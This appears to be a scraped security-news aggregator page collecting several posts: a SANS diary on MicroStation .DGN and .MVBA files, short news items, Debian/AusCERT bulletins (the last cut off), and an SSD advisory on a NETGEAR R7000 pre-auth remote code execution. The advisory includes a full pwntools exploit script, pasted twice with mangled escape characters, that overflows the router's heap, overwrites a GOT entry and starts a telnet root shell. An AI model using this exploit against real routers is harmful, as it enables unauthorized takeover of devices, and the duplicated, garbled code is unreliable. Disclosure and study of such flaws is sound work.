CAD: .DGN and .MVBA Files, (Mon, Apr 26th)

Regularly I receive questions about MicroStation files, since I wrote a diary entry about AutoCAD drawings containing VBA code.

MicroStation is CAD software, and it can run VBA code.

I’ve never been given malicious MicroStation files, but recently I’ve been given a normal drawing (.dgn) and a script file (.mvba).

To be clear: these are not malware samples, the files were given to me so that I could take a look at the internal file format and report it.

Turns out that both files are “OLE files”, and can thus be analyzed with my oledump.py tool.

Here is the .DGN file:

It’s an OLE file with storage (folder) Dgn-Md containing other storages and streams.

And the metadata identifies this as a MicroStation file (I’m using tail to filter out the thumbnail data):

It does not contain VBA code: AFAIK, .DGN files can not contain VBA code. Please post a comment if I’m wrong, or if you can share a sample .DGN file containing VBA code.

The VBA script file, with extension .MVBA, is also an OLE file with VBA code streams:

Here too, the M indicator alerts us to the presence of VBA code. It can be extracted with oledump:

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Read More

The post CAD: .DGN and .MVBA Files, (Mon, Apr 26th) appeared first on Malware Devil.

https://malwaredevil.com/2021/04/26/cad-dgn-and-mvba-files-mon-apr-26th/?utm_source=rss&utm_medium=rss&utm_campaign=cad-dgn-and-mvba-files-mon-apr-26th

Cyber Attacks On The Rise For Businesses

A new report, the Hiscox Cyber Readiness Report 2021, surveyed over 6,000 companies in the U.S. and Europe and found that the number of businesses targeted by cyber criminals in the past year increased from 38% to 43%, with over a quarter of those targeted (28%) experiencing five attacks or more, 

The post Cyber Attacks On The Rise For Businesses appeared first on K2io.

The post Cyber Attacks On The Rise For Businesses appeared first on Security Boulevard.

Read More

The post Cyber Attacks On The Rise For Businesses appeared first on Malware Devil.

https://malwaredevil.com/2021/04/26/cyber-attacks-on-the-rise-for-businesses/?utm_source=rss&utm_medium=rss&utm_campaign=cyber-attacks-on-the-rise-for-businesses

LinkedIn Attacks Show Dangers of Professional Networking

Leveraging the human factor via social media to launch cyberattacks is a tried-and-true method, and one that will be with us for many more years to come. The recent LinkedIn attacks, where malicious actors used fake profiles linked to hostile states to target employees in key industries and government departments in the United Kingdom, demonstrate..

The post LinkedIn Attacks Show Dangers of Professional Networking appeared first on Security Boulevard.

Read More

The post LinkedIn Attacks Show Dangers of Professional Networking appeared first on Malware Devil.

https://malwaredevil.com/2021/04/26/linkedin-attacks-show-dangers-of-professional-networking/?utm_source=rss&utm_medium=rss&utm_campaign=linkedin-attacks-show-dangers-of-professional-networking

What Will Take Emotet’s Place?

Emotet’s seven-year reign of terror will come to an end Sunday, April 25, 2021 – at least in theory, when law enforcement completes a scheduled mass uninstallation of its infrastructure. A ‘scheduled uninstallation.’ Talk about going out with a whimper – that almost seems like an anticlimactic ending for the malware that security pros like..

The post What Will Take Emotet’s Place? appeared first on Security Boulevard.

Read More

The post What Will Take Emotet’s Place? appeared first on Malware Devil.

https://malwaredevil.com/2021/04/26/what-will-take-emotets-place/?utm_source=rss&utm_medium=rss&utm_campaign=what-will-take-emotets-place

Never Give Your Password Over the Phone

Never give your password to someone over the phone. If someone calls you and asks for your password while saying they are from the Help Desk or Tech Support team, it is most likely an attacker attempting to gain access to your account.
Read More

The post Never Give Your Password Over the Phone appeared first on Malware Devil.

https://malwaredevil.com/2021/04/26/never-give-your-password-over-the-phone/?utm_source=rss&utm_medium=rss&utm_campaign=never-give-your-password-over-the-phone

Instagram Anti-Abuse Tool, Apple Advertiser Restrictions, Terrible Passwords

Instagram is rolling out new features to help block spam and abusive messages, Apple releases iOS 14.5 to restrict tracking by advertisers, and a discussion about why people continue to choose terrible passwords. ** Links mentioned on the show ** Instagram debuts new tool to stop abusive message salvos made through new accounts https://www.zdnet.com/article/instagram-debuts-new-means-to-stop-senders-of-abusive-messages-contacting-you-through-new-accounts/ Apple […]

The post Instagram Anti-Abuse Tool, Apple Advertiser Restrictions, Terrible Passwords appeared first on The Shared Security Show.

The post Instagram Anti-Abuse Tool, Apple Advertiser Restrictions, Terrible Passwords appeared first on Security Boulevard.

Read More

The post Instagram Anti-Abuse Tool, Apple Advertiser Restrictions, Terrible Passwords appeared first on Malware Devil.

https://malwaredevil.com/2021/04/26/instagram-anti-abuse-tool-apple-advertiser-restrictions-terrible-passwords/?utm_source=rss&utm_medium=rss&utm_campaign=instagram-anti-abuse-tool-apple-advertiser-restrictions-terrible-passwords

SSD Advisory – NETGEAR Nighthawk R7000 httpd PreAuth RCE

TL;DR

Find out how a vulnerability in NETGEAR R7000 allows an attacker to run arbitrary code without requiring authentication with the device.

Vulnerability Summary

A vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR R7000 routers.

Authentication is not required to exploit this vulnerability.

The vulnerability exists within the handling of HTTP request, the issue results from the lack of proper validation of user supplied data, which can result a heap overflow. An attacker can leverage this vulnerability to execute code with the root privilege.

CVE

PENDING

Credit

An independent security researchers has reported this vulnerability to the SSD Secure Disclosure program.

Affected Versions

Netgear Nighthawk R7000 running firmware version 1.0.11.116 and before

Vendor Response

The vendor has been contacted through Bugcrowd, however Bugcrowd classified it as irrelevant because it was not tested on the “latest” firmware version is 1.3.2.134, which is incorrect. We attempted to contact them again, but subsequent messages got ignored.

This is the most unprofessional behaviour we have noted from Bugcrowd / the vendor – it is clearly a mistaken classification.

Vulnerability Analysis

We start off with bypassing the patch made for the ZDI-20-709 vulnerability. The patch for ZDI-20-709 cannot solve the root cause of the vulnerability. The httpd program allows user to upload a file with the url /backup.cgi.

While the root cause of the vulnerability is that the program uses two variables to represent the length of the uploaded file. One variable is related to the value of the Content-length in the http post request header, the other one is the length of the file content in the http post request body.

The vulnerability exists in the sub_16674 . Below picture is the heap overflow point:

The decompiled code is like this:

The program allocates memory for storing the file content by calling malloc,the return value is stored by dword_1DE2F8 , the size is the value of Content-Length plus 600. The Content-Length value can be controlled by the attacker, thus if we provide a proper value, we can make the malloc to return any size of the heap chunk we want.

The memcpy function copies the http request payload from s1 to dword_1DE2F8 , the copied buffer length is v80-v91 which is the length of the file content in the http post request body.

So this is the problem, the size of the heap-based buffer dword_1DE2F8 can by controlled by the attacker with a small value, and the v80-v91 can also by controlled with another larger value. Thus, it can cause a heap overflow.

Exploit Considerations

The patch for ZDI-20-709 is that it adds a check for one byte before Content-Length , it checks if it is a ‘n’ , so we simply add a ‘n’ before the Content-Length in order to bypass the patch. Though the vulnerabilities are basically the same, but the exploit still needs a lot of efforts because the heap states are different between R6700 and R7000.

We may conduct a fastbin dup attack to the heap overflow vulnerability. But it is not easy to do this. Fastbin dup attack needs two continuous malloc function to get two return address from a same fastbin list, the first malloc returns the chunk whose fd pointer is overwritten by the heap overflow, the second malloc returns the address where we want to write data.

The biggest problem is that there should be no free procedure between these two malloc functions. But dword_1DE2F8 is checked every time before malloc:

If dword_1DE2F8 is not a null pointer, it will be freed and set 0. Thus we should find another point of calling malloc.

Luckily, there is another malloc whose size can by controlled by us, it is in the function of sub_A5B68:

The function handles another file upload http request, we may use the /genierestore.cgi to trigger this function.

But there is another problem, both /genierestore.cgi and /backup.cgi requests can cause the fopen function gets called. The fopen function will call malloc(0x60) and mallloc(0x1000). malloc(0x1000) will cause __malloc_consolidate function gets called which will destroy the fastbin, since the size is larger than the value of max_fast.

We need to find a way to change the max_fast value to a large value so that the __malloc_consolidate will not be triggered. According to the implementation of uClibc free function:

if ((unsigned long)(size) <= (unsigned long)(av->max_fast)
#if TRIM_FASTBINS
/* If TRIM_FASTBINS set, don’t place chunks
bordering top into fastbins */
&& (chunk_at_offset(p, size) != av->top)
#endif
) {
set_fastchunks(av);
fb = &(av->fastbins[fastbin_index(size)]); // <——-when size is set 8 bytes, the fastbin_index(size) is -1
p->fd = *fb;
*fb = p;
}

When we free a chunk whose size is 0x8, fastbin_index(size) return -1, and av->fastbins[fastbin_index(size)] will cause an out-of-bounds access.

struct malloc_state {
/* The maximum chunk size to be eligible for fastbin */
size_t max_fast; /* low 2 bits used as flags */
// 0
/* Fastbins */
// 4
mfastbinptr fastbins[NFASTBINS];
…
}

According to the struct of malloc_state, fb = &(av->fastbins[-1]) exactly points to max_fast , thus *fb = p will make the max_fast to a large value. But in the normal situation, the chunk size cannot be 0x8 bytes, because it means that the user data is 0 byte.

So we can first make use of the heap overflow vulnerability to overwrite the PREV_INUSE flag of a chunk so that it incorrectly indicates that the previous chunk is free. Due to the incorrect PREV_INUSE flag, we can get malloc() to return a chunk that overlaps an actual existing chunk.

This lets us edit the size field in the existing chunk’s metadata, setting it to the invalid value of 8. When this chunk is freed and placed on the fastbin, malloc_stats->max_fast is overwritten by a large value. Then the fopen will not lead to a __malloc_consolidate, so we can conduct a fastbin dup attack.

Once we make the malloc return a chosen address, we could overwrite the GOT entry of the free to the address of system PLT code. Finally we execute utelnetd -l /bin/sh to start the telnet service, then we get the root shell of R7000.

Some techniques were used to make the exploit more reliable:

To make the malloc chunks are adjacent so that the heap overflow will not corrupt other heap-based buffers, I
send a very long payload to trigger closing the tcp connection in advance so that the /backup.cgi request will
not calling fopen subsequently, and there will be no other malloc calling between two http requests.

2. The httpd program’s heap state may be different when user login or logout the web management, to make the heap state consistent,we first try to logon with wrong password for 3 times, the httpd program will redirect the user to a Router Password Reset page. This will make the heap state clear and known

Exploit

# coding: utf-8
from pwn import *
import copy
import sys
def post_request(path, headers, files):
r = remote(rhost, rport)
request = ‘POST %s HTTP/1.1’ % path
request += ‘rn’
request += ‘rn’.join(headers)
request += ‘rnContent-Type: multipart/form-data; boundary=f8ffdd78dbe065014ef28cc53e4808cbrn’
post_data = ‘–f8ffdd78dbe065014ef28cc53e4808cbrnContent-Disposition: form-data; name=”%s”; filename=”%s”rnrn’ % (files[‘name’], files[‘filename’])
post_data += files[‘filecontent’]
request += ‘Content-Length: %irnrn’ % len(post_data)
request += post_data
r.send(request)
sleep(0.5)
r.close()
def gen_request(path, headers, files):
request = ‘POST %s HTTP/1.1’ % path
request += ‘rn’
request += ‘rn’.join(headers)
request += ‘rnContent-Type: multipart/form-data; boundary=f8ffdd78dbe065014ef28cc53e4808cbrn’
post_data = ‘–f8ffdd78dbe065014ef28cc53e4808cbrnContent-Dasposition: form-data; name=”%s”; filename=”%s”rnrn’ % (files[‘name’], files[‘filename’])
post_data += files[‘filecontent’]
request += ‘Content-Length: %irnrn’ % len(post_data)
request += post_data
return request
def make_filename(chunk_size):
return ‘a’ * (0x1d7 – chunk_size)
def send_payload(file_name_len,files):
total_payload = ‘a’*(609 + 1024 * 58)
path = ‘/cgi-bin/genie.cgi?backup.cginContent-Length: 4156559’
headers = [‘Host: %s:%s’ % (rhost, rport), ‘Content-Disposition: form-data’,’a’*0x200 + ‘: anynomous’]
f = copy.deepcopy(files)
f[‘filename’] = make_filename(file_name_len)
valid_payload = gen_request(path, headers, f)
vaild_len = len(valid_payload)
total_len = 609 + 1024 * 58
blind_payload_len = total_len – vaild_len
blind_payload = ‘a’ * blind_payload_len
total_payload = blind_payload + valid_payload
t1 = 0
t2 = 0
for i in range(0,58):
t1 = int(i * 1024)
t2 = int((i+1)*1024 )
chunk = total_payload[t1:t2]

last_chunk = total_payload[t2:]
# print(last_chunk)

r = remote(rhost, rport)
r.send(total_payload)
sleep(0.5)
r.close()
def execute():

headers = [‘Host: %s:%s’ % (rhost, rport), ‘a’*0x200 + ‘: anynomous’]
files = {‘name’: ‘mtenRestoreCfg’, ‘filecontent’: ‘a’}
send_payload(0x18,files)
files = {‘name’: ‘mtenRestoreCfg’, ‘filecontent’: ‘a’}
send_payload(0x20,files)
files = {‘name’: ‘mtenRestoreCfg’, ‘filecontent’: ‘a’}
files[‘filecontent’] = ‘a’ * 0x18 + p32(0x3c0) + p32(0x28)
send_payload(0x18,files)
f = copy.deepcopy(files)
f[‘name’] = ‘StringFilepload’
f[‘filename’] = ‘a’ * 0x100
f[‘filecontent’] = p32(0x3a0).ljust(0x10) + ‘a’* 0x39c + p32(0x9)
post_request(‘/genierestore.cgi’, headers, f)

files = {‘name’: ‘mtenRestoreCfg’, ‘filecontent’: ‘a’}
send_payload(0x18,files)
f = copy.deepcopy(files)
f[‘name’] = ‘StringFilepload’
f[‘filename’] = ‘a’ * 0x100
f[‘filecontent’] = p32(0x20).ljust(0x10) + ‘a’
post_request(‘/genierestore.cgi’, headers, f)
magic_size = 0x48
f = copy.deepcopy(files)
f[‘name’] = ‘StringFilepload’
f[‘filename’] = ‘a’ * 0x100
f[‘filecontent’] = p32(magic_size).ljust(0x10) + ‘a’
post_request(‘/genierestore.cgi’, headers, f)

free_got_addr = 0x00120920
files = {‘name’: ‘mtenRestoreCfg’, ‘filecontent’: ‘a’}
files[‘filecontent’] = ‘a’ * 0x24 + p32(magic_size+ 8 + 1) + p32(free_got_addr – magic_size)
send_payload(0x20,files)

files = {‘name’: ‘mtenRestoreCfg’, ‘filecontent’: ‘a’}
send_payload(magic_size,files)
system_addr_plt = 0x0000E804
command = ‘utelnetd -l /bin/sh’
f = copy.deepcopy(files)
f[‘name’] = ‘StringFilepload’
f[‘filename’] = ‘a’ * 0x100
f[‘filecontent’] = p32(magic_size).ljust(0x10) + command.ljust(magic_size-8, ‘x00’) + p32(system_addr_plt)
post_request(‘/genierestore.cgi’, headers, f)
def send_request():
r = remote(rhost, rport)
login_request=”’
GET / HTTP/1.1r
Host: %sr
Cache-Control: max-age=0r
Authorization: Basic MToxMjM0NTY3ODEyMzEyMw==r
Upgrade-Insecure-Requests: 1r
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9r
Accept-Encoding: gzip, deflater
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8r
Cookie: XSRF_TOKEN=1222440606r
Connection: closer
r
”’% rhost
r.send(login_request)
a = r.recv(0x1000)
# print a
r.close()
return a
if __name__ == ‘__main__’:
context.log_level = ‘error’
if (len(sys.argv) < 3):
print( ‘Usage: %s <rhost> <rport>’ % sys.argv[0])
exit()
rhost = sys.argv[1]
rport = sys.argv[2]
while True:
ret = send_request()
firstline = ret.split(‘n’)[0]
if firstline.find(‘200’) != -1:
break
execute()# coding: utf-8
from pwn import *
import copy
import sys
def post_request(path, headers, files):
r = remote(rhost, rport)
request = ‘POST %s HTTP/1.1’ % path
request += ‘rn’
request += ‘rn’.join(headers)
request += ‘rnContent-Type: multipart/form-data; boundary=f8ffdd78dbe065014ef28cc53e4808cbrn’
post_data = ‘–f8ffdd78dbe065014ef28cc53e4808cbrnContent-Disposition: form-data; name=”%s”; filename=”%s”rnrn’ % (files[‘name’], files[‘filename’])
post_data += files[‘filecontent’]
request += ‘Content-Length: %irnrn’ % len(post_data)
request += post_data
r.send(request)
sleep(0.5)
r.close()
def gen_request(path, headers, files):
request = ‘POST %s HTTP/1.1’ % path
request += ‘rn’
request += ‘rn’.join(headers)
request += ‘rnContent-Type: multipart/form-data; boundary=f8ffdd78dbe065014ef28cc53e4808cbrn’
post_data = ‘–f8ffdd78dbe065014ef28cc53e4808cbrnContent-Dasposition: form-data; name=”%s”; filename=”%s”rnrn’ % (files[‘name’], files[‘filename’])
post_data += files[‘filecontent’]
request += ‘Content-Length: %irnrn’ % len(post_data)
request += post_data
return request
def make_filename(chunk_size):
return ‘a’ * (0x1d7 – chunk_size)
def send_payload(file_name_len,files):
total_payload = ‘a’*(609 + 1024 * 58)
path = ‘/cgi-bin/genie.cgi?backup.cginContent-Length: 4156559’
headers = [‘Host: %s:%s’ % (rhost, rport), ‘Content-Disposition: form-data’,’a’*0x200 + ‘: anynomous’]
f = copy.deepcopy(files)
f[‘filename’] = make_filename(file_name_len)
valid_payload = gen_request(path, headers, f)
vaild_len = len(valid_payload)
total_len = 609 + 1024 * 58
blind_payload_len = total_len – vaild_len
blind_payload = ‘a’ * blind_payload_len
total_payload = blind_payload + valid_payload
t1 = 0
t2 = 0
for i in range(0,58):
t1 = int(i * 1024)
t2 = int((i+1)*1024 )
chunk = total_payload[t1:t2]

last_chunk = total_payload[t2:]
# print(last_chunk)

r = remote(rhost, rport)
r.send(total_payload)
sleep(0.5)
r.close()
def execute():

headers = [‘Host: %s:%s’ % (rhost, rport), ‘a’*0x200 + ‘: anynomous’]
files = {‘name’: ‘mtenRestoreCfg’, ‘filecontent’: ‘a’}
send_payload(0x18,files)
files = {‘name’: ‘mtenRestoreCfg’, ‘filecontent’: ‘a’}
send_payload(0x20,files)
files = {‘name’: ‘mtenRestoreCfg’, ‘filecontent’: ‘a’}
files[‘filecontent’] = ‘a’ * 0x18 + p32(0x3c0) + p32(0x28)
send_payload(0x18,files)
f = copy.deepcopy(files)
f[‘name’] = ‘StringFilepload’
f[‘filename’] = ‘a’ * 0x100
f[‘filecontent’] = p32(0x3a0).ljust(0x10) + ‘a’* 0x39c + p32(0x9)
post_request(‘/genierestore.cgi’, headers, f)

files = {‘name’: ‘mtenRestoreCfg’, ‘filecontent’: ‘a’}
send_payload(0x18,files)
f = copy.deepcopy(files)
f[‘name’] = ‘StringFilepload’
f[‘filename’] = ‘a’ * 0x100
f[‘filecontent’] = p32(0x20).ljust(0x10) + ‘a’
post_request(‘/genierestore.cgi’, headers, f)
magic_size = 0x48
f = copy.deepcopy(files)
f[‘name’] = ‘StringFilepload’
f[‘filename’] = ‘a’ * 0x100
f[‘filecontent’] = p32(magic_size).ljust(0x10) + ‘a’
post_request(‘/genierestore.cgi’, headers, f)

free_got_addr = 0x00120920
files = {‘name’: ‘mtenRestoreCfg’, ‘filecontent’: ‘a’}
files[‘filecontent’] = ‘a’ * 0x24 + p32(magic_size+ 8 + 1) + p32(free_got_addr – magic_size)
send_payload(0x20,files)

files = {‘name’: ‘mtenRestoreCfg’, ‘filecontent’: ‘a’}
send_payload(magic_size,files)
system_addr_plt = 0x0000E804
command = ‘utelnetd -l /bin/sh’
f = copy.deepcopy(files)
f[‘name’] = ‘StringFilepload’
f[‘filename’] = ‘a’ * 0x100
f[‘filecontent’] = p32(magic_size).ljust(0x10) + command.ljust(magic_size-8, ‘x00’) + p32(system_addr_plt)
post_request(‘/genierestore.cgi’, headers, f)
def send_request():
r = remote(rhost, rport)
login_request=”’
GET / HTTP/1.1r
Host: %sr
Cache-Control: max-age=0r
Authorization: Basic MToxMjM0NTY3ODEyMzEyMw==r
Upgrade-Insecure-Requests: 1r
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9r
Accept-Encoding: gzip, deflater
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8r
Cookie: XSRF_TOKEN=1222440606r
Connection: closer
r
”’% rhost
r.send(login_request)
a = r.recv(0x1000)
# print a
r.close()
return a
if __name__ == ‘__main__’:
context.log_level = ‘error’
if (len(sys.argv) < 3):
print( ‘Usage: %s <rhost> <rport>’ % sys.argv[0])
exit()
rhost = sys.argv[1]
rport = sys.argv[2]
while True:
ret = send_request()
firstline = ret.split(‘n’)[0]
if firstline.find(‘200’) != -1:
break
execute()
print(‘router is exploited!!!’)
print(‘router is exploited!!!’)
Read More

The post SSD Advisory – NETGEAR Nighthawk R7000 httpd PreAuth RCE appeared first on Malware Devil.

https://malwaredevil.com/2021/04/26/ssd-advisory-netgear-nighthawk-r7000-httpd-preauth-rce/?utm_source=rss&utm_medium=rss&utm_campaign=ssd-advisory-netgear-nighthawk-r7000-httpd-preauth-rce

The Winds of Change – What SolarWinds Teaches Us

In December 2020, the world discovered that the SolarWinds’ Orion Platform had been compromised by cybercriminals, potentially affecting thousands of businesses the world over. Security groups such as the National Cyber Security Centre (NCSC) provided advice and guidance to security teams and IT companies on what actions they should take to minimize the impact on […]… Read More

The post The Winds of Change – What SolarWinds Teaches Us appeared first on The State of Security.

The post The Winds of Change – What SolarWinds Teaches Us appeared first on Security Boulevard.

Read More

The post The Winds of Change – What SolarWinds Teaches Us appeared first on Malware Devil.

https://malwaredevil.com/2021/04/26/the-winds-of-change-what-solarwinds-teaches-us/?utm_source=rss&utm_medium=rss&utm_campaign=the-winds-of-change-what-solarwinds-teaches-us

ESB-2021.1395 – [Debian] libspring-java: Multiple vulnerabilities

—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256

===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.1395
libspring-java security update
26 April 2021

===========================================================================

AusCERT Security Bulletin Summary
———————————

Product: libspring-java
Publisher: Debian
Operating System: Debian GNU/Linux
Impact/Access: Execute Arbitrary Code/Commands — Remote/Unauthenticated
Denial of Service — Remote/Unauthenticated
Access Confidential Data — Remote/Unauthenticated
Resolution: Patch/Upgrade
CVE Names: CVE-2018-15756 CVE-2018-11040 CVE-2018-11039
CVE-2018-1270

Reference: ESB-2020.2537
ESB-2020.1400

Original Bulletin:
https://lists.debian.org/debian-lts-announce/2021/04/msg00022.html

– ————————–BEGIN INCLUDED TEXT——————–

– —–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA512

– – ————————————————————————-
Debian LTS Advisory DLA-2635-1 debian-lts@lists.debian.org
https://www.debian.org/lts/security/
April 23, 2021 https://wiki.debian.org/LTS
– – ————————————————————————-

Package : libspring-java
Version : 4.3.5-1+deb9u1
CVE ID : CVE-2018-1270 CVE-2018-11039 CVE-2018-11040 CVE-2018-15756
Debian Bug : 895114 911786

Multiple vulnerabilities were discovered in libspring-java, a modular
Java/J2EE application framework. An attacker may execute code, perform
XST attack, issue unauthorized cross-domain requests or cause a DoS
(Denial-of-Service) in specific configurations.

CVE-2018-1270

Spring Framework allows applications to expose STOMP over
WebSocket endpoints with a simple, in-memory STOMP broker through
the spring-messaging module. A malicious user (or attacker) can
craft a message to the broker that can lead to a remote code
execution attack.

CVE-2018-11039

Spring Framework allows web applications to change the HTTP
request method to any HTTP method (including TRACE) using the
HiddenHttpMethodFilter in Spring MVC. If an application has a
pre-existing XSS vulnerability, a malicious user (or attacker) can
use this filter to escalate to an XST (Cross Site Tracing) attack.

CVE-2018-11040

Spring Framework allows web applications to enable cross-domain
requests via JSONP (JSON with Padding) through
AbstractJsonpResponseBodyAdvice for REST controllers and
MappingJackson2JsonView for browser requests. Both are not enabled
by default in Spring Framework nor Spring Boot, however, when
MappingJackson2JsonView is configured in an application, JSONP
support is automatically ready to use through the “jsonp” and
“callback” JSONP parameters, enabling cross-domain requests.

CVE-2018-15756

Spring Framework provides support for range requests when serving
static resources through the ResourceHttpRequestHandler, or
starting in 5.0 when an annotated controller returns an
org.springframework.core.io.Resource. A malicious user (or
attacker) can add a range header with a high number of ranges, or
with wide ranges that overlap, or both, for a denial of service
attack.

For Debian 9 stretch, these problems have been fixed in version
4.3.5-1+deb9u1.

We recommend that you upgrade your libspring-java packages.

For the detailed security status of libspring-java please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/libspring-java

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
– —–BEGIN PGP SIGNATURE—–

iQIzBAEBCgAdFiEE1vEOfV7HXWKqBieIDTl9HeUlXjAFAmCDEAAACgkQDTl9HeUl
XjAqJw//Uln8F+rc+JvRzZyNEN03+jPh2hmL2rK3xSEp4jPdoTSSPB6nzgDE0gXU
FP7LIvOva6i4bmxKK/ixJsgB/ZtqFIxpFbWb6VMV5GC/xCpjhdKxTOI96Se/Ydal
/IBit5qQmXxy5HoSJl6rsfQUQQBu6mAo9LOeSyWsECENkW7OtOQRWEz+isHRRyeg
U88+PYs3tqO4J3FtE/vzS5UjRIygaesz5V8szA1jam/cx3KhTatIDE52Ist1huK7
IaCJ6pkFmjc0eJ0ALmQp37A3pzPm9Lq01V/IKwxYijqC8I0DgPiHds5rHCQiOcJo
tPYHPtnp9/IiMaQZw8gSYgvmTyMHwpYk+x2QWdMGaT2HILAd44zn1I86qhOIXts8
ofHJCZVyawHNMrsYxoTJ/HrJ/3ECamI9tmLyRpUmiLcTUmgV+tUxM4FmhLKobuqb
8vctLZL/qmAm+JR5PDptjc3UR0zTqGgjshy94V982ANJCQFe0lMASj5DH9IW3473
dCqyduvrlykfI/0Nl4NkXTEKZeizyIKtw1JOYFr6bjP0UCvM3jTSWwiXquFh9v3O
A6FddCEMoLPEmyPYyYZUe4X5q4Gjsd1AXhhnEVIppXrS6akiCfaw8ZyAvt2MJIiW
51g8FtAypeQloIV91lPbyf+RIZ27n61r1AcDXPZrewTlIuZdNv4=
=bEmi
– —–END PGP SIGNATURE—–

– ————————–END INCLUDED TEXT——————–

You have received this e-mail bulletin as a result of your organisation’s
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT’s members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation’s
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author’s website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
—–BEGIN PGP SIGNATURE—–
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBYIZZuuNLKJtyKPYoAQgBRhAAh/iS1yp1oG9umpdE1joZ4z5Yeytzn5FH
t7blELh9RJUO/NaQohoA+0aj1NLQ8Q6GTeUnO5BlhZuD2X6tt+yNst4CDh3ZORm/
bCdT4uJO8jDxjQSDq/iVVfs5+3XiDSnoqk6GUWH6X2/s/9MEgDu26PVBVqR4YqmL
230P1ZOXncuWUsNz0MWcBVGsJ8ByLqAtKK5kbj/kBmJ5lPNv2iUNTmdgWOW5BIa6
aram7AwcoAuVRX4RhXf4uhDneCld+7G27KFpZuRs4lu9QQLOwB235DurNI6bBkgL
LsycfaZxw7FIRifTSZr+nVS40JYHgNHYUgF6/QNX2Nx4rxdmhFtSh7RkzwpQZfYg
hu086eat9yZiJk+ZZ07ip1p0iUJAeH2ErVgPXmqj3A6RdM1UmMlQuj5piyjtspIY
pFwFUwNZAvGMyfipgY5ZQR1MYGfkY5hrjhKdy+mkbtWC8bTxFvvSvMstuG9wn48F
h+eSMw+kx8zsRFbH3rAknAPaIl7YN5h3IS8uUNKLiTc5rcJUe34MS6/CyWqeUWIR
/afTq+VBlyGOJJYt+m+RiLeZX2/58qy3XeVCw2F5kByZCXUs2c+84kn63r5bofs9
j60wS6Dbu9qSM6pqxjUrZSFC669ljwMSW5G8OQF5k1XGAXTV9hsnTKlsRYo66B57
X/BAWJjRwqw=
=yhJo
—–END PGP SIGNATURE—–

Read More

The post ESB-2021.1395 – [Debian] libspring-java: Multiple vulnerabilities appeared first on Malware Devil.

https://malwaredevil.com/2021/04/26/esb-2021-1395-debian-libspring-java-multiple-vulnerabilities/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2021-1395-debian-libspring-java-multiple-vulnerabilities

ESB-2021.1396 – [UNIX/Linux][Debian] pjproject: Denial of service – Remote with user interaction

—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256

===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.1396
pjproject security update
26 April 2021

===========================================================================

AusCERT Security Bulletin Summary
———————————

Product: pjproject
Publisher: Debian
Operating System: Debian GNU/Linux
UNIX variants (UNIX, Linux, OSX)
Impact/Access: Denial of Service — Remote with User Interaction
Resolution: Patch/Upgrade
CVE Names: CVE-2021-21375

Original Bulletin:
https://lists.debian.org/debian-lts-announce/2021/04/msg00023.html

Comment: This advisory references vulnerabilities in products which run on
platforms other than Debian. It is recommended that administrators
running pjproject check for an updated version of the software for
their operating system.

– ————————–BEGIN INCLUDED TEXT——————–

– —–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA512

– – ————————————————————————-
Debian LTS Advisory DLA-2636-1 debian-lts@lists.debian.org
https://www.debian.org/lts/security/ Thorsten Alteholz
April 23, 2021 https://wiki.debian.org/LTS
– – ————————————————————————-

Package : pjproject
Version : 2.5.5~dfsg-6+deb9u2
CVE ID : CVE-2021-21375

An issue has been found in pjproject, a set of libraries for the PJ
Project.
Due to bad handling of two consecutive crafted answers to an INVITE, the
attacker is able to crash the server resulting in a denial of service.

For Debian 9 stretch, this problem has been fixed in version
2.5.5~dfsg-6+deb9u2.

We recommend that you upgrade your pjproject packages.

For the detailed security status of pjproject please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/pjproject

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS

– —–BEGIN PGP SIGNATURE—–

iQKTBAEBCgB9FiEEYgH7/9u94Hgi6ruWlvysDTh7WEcFAmCDETlfFIAAAAAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDYy
